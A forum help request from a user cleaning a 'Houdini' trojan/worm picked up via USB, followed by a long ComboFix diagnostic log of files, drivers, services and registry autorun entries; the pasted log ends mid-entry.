Houdini Trojan/Worm

November 11, 2016, 7:45 pm

I have a houdini trojan/worm on my computer, got it from my schools public computers (yes I know, im stupid for sticking a usb into a public school computer :v).I have succesively got it off my USB, stopped most of its functiones like blocking my access to regedit, msconfig and transfering the trojan to my USB, But only by disabling Windows Script Host (or something along the lines)
It uses wscript, that I know due to in the USB the cmd file executed a wscript, But I'm not sure if Its safe to just delete wscript all together, since it is a windows pre-installed file, and the virus is only just using it

I've deleted some files using a variety of programs like RogueKiller, SMADAV, Malwarebytes, Combofix(Ill post the combofix log in a sec)and abunch more, Avast did absolutely nothing, So I'm thinking about swapping avast with AVG (tho I dont know if I should, or just wait for avast to take things from AVG since avast bought AVG), but I'm sure that there are still files and traces left of Houdini, and I'm afraid that the worm will make it multiply. Thanks

Combo Fix Log:
ComboFix 16-11-06.01 - Usuario 11/11/2016 20:11:18.1.2 - x64
Microsoft Windows 7 Home Basic 6.1.7601.1.1252.1.3082.18.3580.1745 [GMT -6:00]
Running from: c:\users\Usuario\Downloads\ComboFix.exe
AV: Avast Antivirus *Disabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
SP: Avast Antivirus *Disabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\users\Usuario\AppData\Local\DeSmuME
c:\users\Usuario\AppData\Local\DeSmuME\Battery\4780 - Pokemon HeartGold (U)(Xenophobia).dsv
c:\users\Usuario\AppData\Local\DeSmuME\desmume.ini
c:\users\Usuario\AppData\Local\DeSmuME\States\4780 - Pokemon HeartGold (U)(Xenophobia).ds0
c:\users\Usuario\AppData\Roaming\Microsoft\Windows\Recent\Team Fortress 2.url
c:\windows\SysWow64\1
c:\windows\SysWow64\2
c:\windows\SysWow64\3
c:\windows\SysWow64\DEBUG.log
.
.
((((((((((((((((((((((((((((((((((((((( Drivers/Services )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
-------\Service_AdobeUpdateService
.
.
((((((((((((((((((((((((( Files Created from 2016-10-12 to 2016-11-12 )))))))))))))))))))))))))))))))
.
.
2016-11-12 02:40 . 2016-11-12 02:40 -------- d-----w- c:\users\Default\AppData\Local\temp
2016-11-11 21:24 . 2016-11-11 21:24 28272 ----a-w- c:\windows\system32\drivers\TrueSight.sys
2016-11-11 04:36 . 2016-11-12 02:50 192216 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2016-11-11 04:31 . 2016-11-11 04:31 -------- d-----w- c:\program files (x86)\Malwarebytes Anti-Malware
2016-11-11 04:31 . 2016-11-11 04:31 -------- d-----w- c:\programdata\Malwarebytes
2016-11-11 04:31 . 2016-03-10 20:09 64896 ----a-w- c:\windows\system32\drivers\mwac.sys
2016-11-11 04:31 . 2016-03-10 20:08 140672 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2016-11-11 04:31 . 2016-03-10 20:08 27008 ----a-w- c:\windows\system32\drivers\mbam.sys
2016-11-11 00:44 . 2016-11-11 15:24 -------- d-----w- c:\users\Usuario\AppData\Roaming\Enigma Software Group
2016-11-11 00:43 . 2016-11-11 00:43 -------- d-----w- C:\sh4ldr
2016-11-11 00:42 . 2016-11-11 15:24 -------- d-----w- c:\program files\Enigma Software Group
2016-11-10 22:01 . 2016-11-10 22:01 -------- d-----w- c:\program files (x86)\Common Files\SpeedyPC Software
2016-11-10 22:01 . 2016-11-10 22:01 -------- d-----w- c:\program files\BDServices
2016-11-10 21:57 . 2016-11-10 22:22 -------- d-----w- C:\[Smad-Cage]
2016-11-10 06:10 . 2016-11-10 06:10 -------- d-----w-Smad-Lock (Brankas Smadav) ? C:\SMAD-L~1
2016-11-10 05:44 . 2016-11-10 05:44 44952 ----a-w- c:\windows\system32\drivers\staport.sys
2016-11-10 05:43 . 2016-11-10 01:31 391496 ----a-w- c:\windows\system32\aswBoot.exe
2016-11-10 01:30 . 2016-11-10 01:30 53208 ----a-w- c:\windows\avastSS.scr
2016-11-09 06:15 . 2016-11-09 06:15 -------- d-----w- c:\users\Usuario\AppData\Roaming\Smadav
2016-11-09 06:15 . 2016-11-10 06:04 -------- d-----w- c:\program files (x86)\SMADAV
2016-11-09 06:03 . 2016-11-09 06:06 -------- d-----w- c:\program files\RogueKiller
2016-11-09 06:03 . 2016-11-12 01:57 -------- d-----w- c:\programdata\RogueKiller
2016-11-09 04:35 . 2016-11-09 04:35 -------- d-----w- c:\program files\7-Zip
2016-10-31 06:21 . 2016-11-10 01:24 -------- d--h--w- c:\users\Usuario\AppData\Roaming\jieio
2016-10-17 17:22 . 2016-10-17 17:22 -------- d-----w- c:\program files (x86)\Common Files\Skype
2016-10-16 05:49 . 2016-11-11 16:52 -------- d-----w- c:\users\Usuario\AppData\Local\Deployment
2016-10-16 05:49 . 2016-10-16 05:49 -------- d-----w- c:\users\Usuario\AppData\Local\Apps
2016-10-16 05:28 . 2016-10-16 05:28 -------- d-----w- c:\users\Usuario\AppData\Roaming\InstallShield
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2016-11-10 01:32 . 2014-11-13 17:51 293352 ----a-w- c:\windows\system32\drivers\aswVmm.sys
2016-11-10 01:32 . 2014-11-13 17:51 513632 ----a-w- c:\windows\system32\drivers\aswSP.sys
2016-11-10 01:32 . 2014-11-13 17:51 969184 ----a-w- c:\windows\system32\drivers\aswSnx.sys
2016-11-10 01:31 . 2014-11-13 17:51 163416 ----a-w- c:\windows\system32\drivers\aswStm.sys
2016-11-10 01:31 . 2014-11-13 17:51 74544 ----a-w- c:\windows\system32\drivers\aswRvrt.sys
2016-11-10 01:31 . 2014-11-13 17:51 37656 ----a-w- c:\windows\system32\drivers\aswHwid.sys
2016-11-10 01:31 . 2014-11-13 17:51 108816 ----a-w- c:\windows\system32\drivers\aswMonFlt.sys
2016-11-10 01:31 . 2014-11-13 17:51 103064 ----a-w- c:\windows\system32\drivers\aswRdr2.sys
2016-11-10 01:30 . 2016-06-14 15:27 37144 ----a-w- c:\windows\system32\drivers\aswKbd.sys
2016-11-07 00:27 . 2015-03-11 03:33 796352 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2016-11-07 00:27 . 2015-03-11 03:33 142528 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2016-10-14 10:56 . 2016-10-14 10:56 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{6B2B8607-677B-4FC2-AD46-47DA76BE4F15}\offreg.4736.dll
2016-10-13 07:14 . 2016-10-13 07:14 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{6B2B8607-677B-4FC2-AD46-47DA76BE4F15}\offreg.4028.dll
2016-10-01 08:19 . 2016-10-01 08:19 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{6B2B8607-677B-4FC2-AD46-47DA76BE4F15}\offreg.1268.dll
2016-09-25 09:12 . 2016-09-25 09:12 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{6B2B8607-677B-4FC2-AD46-47DA76BE4F15}\offreg.3064.dll
2016-09-07 07:10 . 2016-09-07 07:10 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{6B2B8607-677B-4FC2-AD46-47DA76BE4F15}\offreg.3124.dll
2016-09-06 10:31 . 2016-09-06 10:31 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{6B2B8607-677B-4FC2-AD46-47DA76BE4F15}\offreg.172.dll
2016-08-30 09:58 . 2016-08-30 09:58 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{6B2B8607-677B-4FC2-AD46-47DA76BE4F15}\offreg.4436.dll
2016-08-29 17:04 . 2016-08-29 17:04 485512 ----a-w- c:\windows\system32\drivers\Trufos.sys
2016-08-27 07:41 . 2016-08-27 07:41 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{6B2B8607-677B-4FC2-AD46-47DA76BE4F15}\offreg.3188.dll
2016-08-24 09:37 . 2016-08-24 09:37 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{6B2B8607-677B-4FC2-AD46-47DA76BE4F15}\offreg.5448.dll
2016-08-17 08:40 . 2016-08-17 08:40 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{6B2B8607-677B-4FC2-AD46-47DA76BE4F15}\offreg.5620.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive1]
@="{F241C880-6982-4CE5-8CF7-7085BA96DA5A}"
[HKEY_CLASSES_ROOT\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}]
2015-05-31 04:24 223432 ----a-w- c:\users\Usuario\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\SkyDriveShell.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive2]
@="{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}"
[HKEY_CLASSES_ROOT\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}]
2015-05-31 04:24 223432 ----a-w- c:\users\Usuario\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\SkyDriveShell.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive3]
@="{BBACC218-34EA-4666-9D7A-C78F2274A524}"
[HKEY_CLASSES_ROOT\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}]
2015-05-31 04:24 223432 ----a-w- c:\users\Usuario\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\SkyDriveShell.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\###MegaShellExtPending]
@="{056D528D-CE28-4194-9BA3-BA2E9197FF8C}"
[HKEY_CLASSES_ROOT\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C}]
2014-05-01 14:15 463360 ----a-w- c:\users\Usuario\AppData\Local\MEGAsync\ShellExtX32.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\###MegaShellExtSynced]
@="{05B38830-F4E9-4329-978B-1DD28605D202}"
[HKEY_CLASSES_ROOT\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202}]
2014-05-01 14:15 463360 ----a-w- c:\users\Usuario\AppData\Local\MEGAsync\ShellExtX32.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\###MegaShellExtSyncing]
@="{0596C850-7BDD-4C9D-AFDF-873BE6890637}"
[HKEY_CLASSES_ROOT\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637}]
2014-05-01 14:15 463360 ----a-w- c:\users\Usuario\AppData\Local\MEGAsync\ShellExtX32.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Steam"="c:\program files (x86)\Steam\steam.exe" [2016-10-13 2860832]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"SM?RT-Protection"="c:\program files (x86)\Smadav\SM?RTP.exe" [?]
"AvastUI.exe"="c:\program files\AVAST Software\Avast\AvastUI.exe" [2016-11-10 9044392]
"RazerCortex"="c:\program files (x86)\Razer\Razer Cortex\RazerCortex.exe" [2015-06-05 98256]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
"SoftwareSASGeneration"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\drivers32]
"aux"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa]
Notification Packages REG_MULTI_SZ scecli c:\program files\TrueKey\McAfeeTrueKeyPasswordFilter
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\run-]
"SunJavaUpdateSched"="c:\program files (x86)\Common Files\Java\Java Update\jusched.exe"
"BlueStacks Agent"=c:\program files (x86)\BlueStacks\HD-Agent.exe
"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
.
R0 ddkmdldr;ddkmdldr;c:\windows\system32\drivers\ddkmdldr.sys;c:\windows\SYSNATIVE\drivers\ddkmdldr.sys [x]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 ddmgr;ddmgr;c:\windows\system32\ddmgr.exe;c:\windows\SYSNATIVE\ddmgr.exe [x]
R2 InstallerService;Service Installer TrueKey;c:\program files\TrueKey\Mcafee.TrueKey.InstallerService.exe;c:\program files\TrueKey\Mcafee.TrueKey.InstallerService.exe [x]
R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]
R3 AFTrafMgr1.1;AFTrafMgr1.1;c:\program files (x86)\Hotspot Shield\bin\TrafMgr_1_1_64.sys;c:\program files (x86)\Hotspot Shield\bin\TrafMgr_1_1_64.sys [x]
R3 amdiox64;AMD IO Driver;c:\windows\system32\DRIVERS\amdiox64.sys;c:\windows\SYSNATIVE\DRIVERS\amdiox64.sys [x]
R3 aswHwid;avast! HardwareID;c:\windows\system32\drivers\aswHwid.sys;c:\windows\SYSNATIVE\drivers\aswHwid.sys [x]
R3 BstHdAndroidSvc;BlueStacks Android Service;c:\program files (x86)\BlueStacks\HD-Service.exe BstHdAndroidSvc Android;c:\program files (x86)\BlueStacks\HD-Service.exe BstHdAndroidSvc Android [x]
R3 BstHdLogRotatorSvc;BlueStacks Log Rotator Service;c:\program files (x86)\BlueStacks\HD-LogRotatorService.exe;c:\program files (x86)\BlueStacks\HD-LogRotatorService.exe [x]
R3 BstHdUpdaterSvc;BlueStacks Updater Service;c:\program files (x86)\BlueStacks\HD-UpdaterService.exe;c:\program files (x86)\BlueStacks\HD-UpdaterService.exe [x]
R3 cpuz134;cpuz134;c:\users\Usuario\AppData\Local\Temp\cpuz134\cpuz134_x64.sys;c:\users\Usuario\AppData\Local\Temp\cpuz134\cpuz134_x64.sys [x]
R3 DxkgFilter;Filtering Dxkg;c:\program files (x86)\iDisplay\idisplay.sys;c:\program files (x86)\iDisplay\idisplay.sys [x]
R3 EagleX64;EagleX64;c:\windows\system32\drivers\EagleX64.sys;c:\windows\SYSNATIVE\drivers\EagleX64.sys [x]
R3 EasyAntiCheat;EasyAntiCheat;c:\windows\system32\EasyAntiCheat.exe;c:\windows\SYSNATIVE\EasyAntiCheat.exe [x]
R3 EvolveVirtualAdapter;Evolve Virtual Miniport Driver;c:\windows\system32\DRIVERS\evolve.sys;c:\windows\SYSNATIVE\DRIVERS\evolve.sys [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 McComponentHostService;McAfee Security Scan Component Host Service;c:\program files\McAfee Security Scan\3.11.266\McCHSvc.exe;c:\program files\McAfee Security Scan\3.11.266\McCHSvc.exe [x]
R3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys;c:\windows\SYSNATIVE\DRIVERS\Rt64win7.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]
R3 TuneUpUtilitiesDrv;TuneUpUtilitiesDrv;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [x]
R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
R3 VSStandardCollectorService140;Visual Studio Standard Collector Service;c:\program files (x86)\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe;c:\program files (x86)\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [x]
R3 wsvd;wsvd;c:\windows\system32\DRIVERS\wsvd.sys;c:\windows\SYSNATIVE\DRIVERS\wsvd.sys [x]
R3 X6va029;X6va029;c:\windows\SysWOW64\Drivers\X6va029;c:\windows\SysWOW64\Drivers\X6va029 [x]
R4 AGSService;Adobe Genuine Software Integrity Service;c:\program files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe;c:\program files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [x]
R4 ddkmd;ddkmd;c:\windows\system32\drivers\ddkmd.sys;c:\windows\SYSNATIVE\drivers\ddkmd.sys [x]
R4 hshld;Hotspot Shield Service;c:\program files (x86)\Hotspot Shield\bin\cmw_srv.exe;c:\program files (x86)\Hotspot Shield\bin\cmw_srv.exe [x]
R4 MF NTFS Monitor;MediaFire NTFS Monitor;c:\users\Usuario\AppData\Local\MEDIAF~1\MFUSNM~1.EXE;c:\users\Usuario\AppData\Local\MEDIAF~1\MFUSNM~1.EXE [x]
R4 RadeonPro Support Service;RadeonPro Support Service;c:\program files (x86)\RadeonPro\RadeonProSupport.exe;c:\program files (x86)\RadeonPro\RadeonProSupport.exe [x]
R4 SSUService;Splashtop Software Updater Service;c:\program files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe;c:\program files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe [x]
R4 TrueKey;Intel Security True Key;c:\program files\TrueKey\McAfee.TrueKey.Service.exe;c:\program files\TrueKey\McAfee.TrueKey.Service.exe [x]
R4 TrueKeyScheduler;Intel Security True Key Scheduler;c:\program files\TrueKey\McTkSchedulerService.exe;c:\program files\TrueKey\McTkSchedulerService.exe [x]
R4 TrueKeyServiceHelper;TrueKeyServiceHelper;c:\program files\TrueKey\McAfee.TrueKey.ServiceHelper.exe;c:\program files\TrueKey\McAfee.TrueKey.ServiceHelper.exe [x]
R4 TuneUp.UtilitiesSvc;AVG PC TuneUp Service;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe [x]
S0 aswRvrt;avast! Revert; [x]
S0 aswVmm;avast! VM Monitor; [x]
S0 PxHlpa64;PxHlpa64;c:\windows\System32\Drivers\PxHlpa64.sys;c:\windows\SYSNATIVE\Drivers\PxHlpa64.sys [x]
S0 WinI2C-DDC;WinI2C-DDC Kernel Mode Driver;c:\windows\system32\drivers\DDCDrv.sys;c:\windows\SYSNATIVE\drivers\DDCDrv.sys [x]
S1 aswKbd;aswKbd;c:\windows\system32\drivers\aswKbd.sys;c:\windows\SYSNATIVE\drivers\aswKbd.sys [x]
S1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys;c:\windows\SYSNATIVE\drivers\aswSnx.sys [x]
S1 aswSP;aswSP;c:\windows\system32\drivers\aswSP.sys;c:\windows\SYSNATIVE\drivers\aswSP.sys [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 AMD FUEL Service;AMD FUEL Service;c:\program files\AMD\ATI.ACE\Fuel\Fuel.Service.exe;c:\program files\AMD\ATI.ACE\Fuel\Fuel.Service.exe [x]
S2 Apple Mobile Device Service;Apple Mobile Device Service;c:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe;c:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [x]
S2 APXACC;AppEx Networks Accelerator LWF;c:\windows\system32\DRIVERS\appexDrv.sys;c:\windows\SYSNATIVE\DRIVERS\appexDrv.sys [x]
S2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys;c:\windows\SYSNATIVE\drivers\aswMonFlt.sys [x]
S2 aswStm;aswStm;c:\windows\system32\drivers\aswStm.sys;c:\windows\SYSNATIVE\drivers\aswStm.sys [x]
S2 BitDefenderCOM;BitDefenderCOM;c:\program files\BDServices\BitDefenderCom.exe;c:\program files\BDServices\BitDefenderCom.exe [x]
S2 BstHdDrv;BlueStacks Hypervisor;c:\program files (x86)\BlueStacks\HD-Hypervisor-amd64.sys;c:\program files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [x]
S2 DiagTrack;Diagnostics Tracking Service;c:\windows\System32\svchost.exe;c:\windows\SYSNATIVE\svchost.exe [x]
S2 IconMan_R;IconMan_R;c:\program files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe;c:\program files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe [x]
S2 JME Keyboard;JME Keyboard Driver;c:\windows\jmesoft\Service.exe;c:\windows\jmesoft\Service.exe [x]
S2 MBAMScheduler;MBAMScheduler;c:\program files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe;c:\program files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [x]
S2 MBAMService;MBAMService;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [x]
S2 mfmonitor;mfmonitor;c:\windows\system32\DRIVERS\mfmonitor_x64.sys;c:\windows\SYSNATIVE\DRIVERS\mfmonitor_x64.sys [x]
S2 Razer Game Scanner Service;Razer Game Scanner;c:\program files (x86)\Razer\Razer Services\GSS\GameScannerService.exe;c:\program files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [x]
S2 RzKLService;RzKLService;c:\program files (x86)\Razer\Razer Cortex\RzKLService.exe;c:\program files (x86)\Razer\Razer Cortex\RzKLService.exe [x]
S2 rzpmgrk;rzpmgrk;c:\windows\system32\drivers\rzpmgrk.sys;c:\windows\SYSNATIVE\drivers\rzpmgrk.sys [x]
S3 AtiHDAudioService;AMD Function Driver for HD Audio Service;c:\windows\system32\drivers\AtihdW76.sys;c:\windows\SYSNATIVE\drivers\AtihdW76.sys [x]
S3 clwvd;CyberLink WebCam Virtual Driver;c:\windows\system32\DRIVERS\clwvd.sys;c:\windows\SYSNATIVE\DRIVERS\clwvd.sys [x]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys;c:\windows\SYSNATIVE\drivers\mbam.sys [x]
S3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\MBAMSwissArmy.sys;c:\windows\SYSNATIVE\drivers\MBAMSwissArmy.sys [x]
S3 MBAMWebAccessControl;MBAMWebAccessControl;c:\windows\system32\drivers\mwac.sys;c:\windows\SYSNATIVE\drivers\mwac.sys [x]
S3 RSPCIESTOR;Realtek PCIE CardReader Driver;c:\windows\system32\DRIVERS\RtsPStor.sys;c:\windows\SYSNATIVE\DRIVERS\RtsPStor.sys [x]
S3 RTL8192Ce;Realtek Wireless LAN 802.11n PCI-E NIC Driver;c:\windows\system32\DRIVERS\rtl8192Ce.sys;c:\windows\SYSNATIVE\DRIVERS\rtl8192Ce.sys [x]
S3 taphss6;Anchorfree HSS VPN Adapter;c:\windows\system32\DRIVERS\taphss6.sys;c:\windows\SYSNATIVE\DRIVERS\taphss6.sys [x]
S3 usbfilter;AMD USB Filter Driver;c:\windows\system32\DRIVERS\usbfilter.sys;c:\windows\SYSNATIVE\DRIVERS\usbfilter.sys [x]
S3 VMC412;Vimicro Camera Service VMC412;c:\windows\system32\Drivers\VMC412.sys;c:\windows\SYSNATIVE\Drivers\VMC412.sys [x]
S3 vwhid;Virtual Wireless HID;c:\windows\system32\DRIVERS\vwhid.sys;c:\windows\SYSNATIVE\DRIVERS\vwhid.sys [x]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - MBAMSWISSARMY
*NewlyCreated* - WS2IFSL
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2016-11-03 01:54 1363560 ----a-w- c:\program files (x86)\Google\Chrome\Application\54.0.2840.87\Installer\chrmstp.exe
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{A6EADE66-0000-0000-484E-7E8A45000000}]
2016-06-30 11:55 322232 ----a-w- c:\program files (x86)\Adobe\Acrobat Reader DC\Esl\AiodLite.dll
.
Contents of the 'Scheduled Tasks' folder
.
2016-11-12 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-03-11 00:27]
.
2016-11-12 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2012-04-27 12:09]
.
2016-11-12 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2012-04-27 12:09]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ AccExtIco1]
@="{AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47}"
[HKEY_CLASSES_ROOT\CLSID\{AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47}]
2015-11-14 10:23 553120 ------w- c:\program files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ AccExtIco2]
@="{853B7E05-C47D-4985-909A-D0DC5C6D7303}"
[HKEY_CLASSES_ROOT\CLSID\{853B7E05-C47D-4985-909A-D0DC5C6D7303}]
2015-11-14 10:23 553120 ------w- c:\program files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ AccExtIco3]
@="{42D38F2E-98E9-4382-B546-E24E4D6D04BB}"
[HKEY_CLASSES_ROOT\CLSID\{42D38F2E-98E9-4382-B546-E24E4D6D04BB}]
2015-11-14 10:23 553120 ------w- c:\program files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive1]
@="{F241C880-6982-4CE5-8CF7-7085BA96DA5A}"
[HKEY_CLASSES_ROOT\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}]
2015-05-31 04:24 262344 ----a-w- c:\users\Usuario\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\SkyDriveShell64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive2]
@="{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}"
[HKEY_CLASSES_ROOT\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}]
2015-05-31 04:24 262344 ----a-w- c:\users\Usuario\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\SkyDriveShell64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive3]
@="{BBACC218-34EA-4666-9D7A-C78F2274A524}"
[HKEY_CLASSES_ROOT\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}]
2015-05-31 04:24 262344 ----a-w- c:\users\Usuario\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\SkyDriveShell64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\###MegaShellExtPending]
@="{056D528D-CE28-4194-9BA3-BA2E9197FF8C}"
[HKEY_CLASSES_ROOT\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C}]
2014-05-01 14:13 470016 ----a-w- c:\users\Usuario\AppData\Local\MEGAsync\ShellExtX64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\###MegaShellExtSynced]
@="{05B38830-F4E9-4329-978B-1DD28605D202}"
[HKEY_CLASSES_ROOT\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202}]
2014-05-01 14:13 470016 ----a-w- c:\users\Usuario\AppData\Local\MEGAsync\ShellExtX64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\###MegaShellExtSyncing]
@="{0596C850-7BDD-4C9D-AFDF-873BE6890637}"
[HKEY_CLASSES_ROOT\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637}]
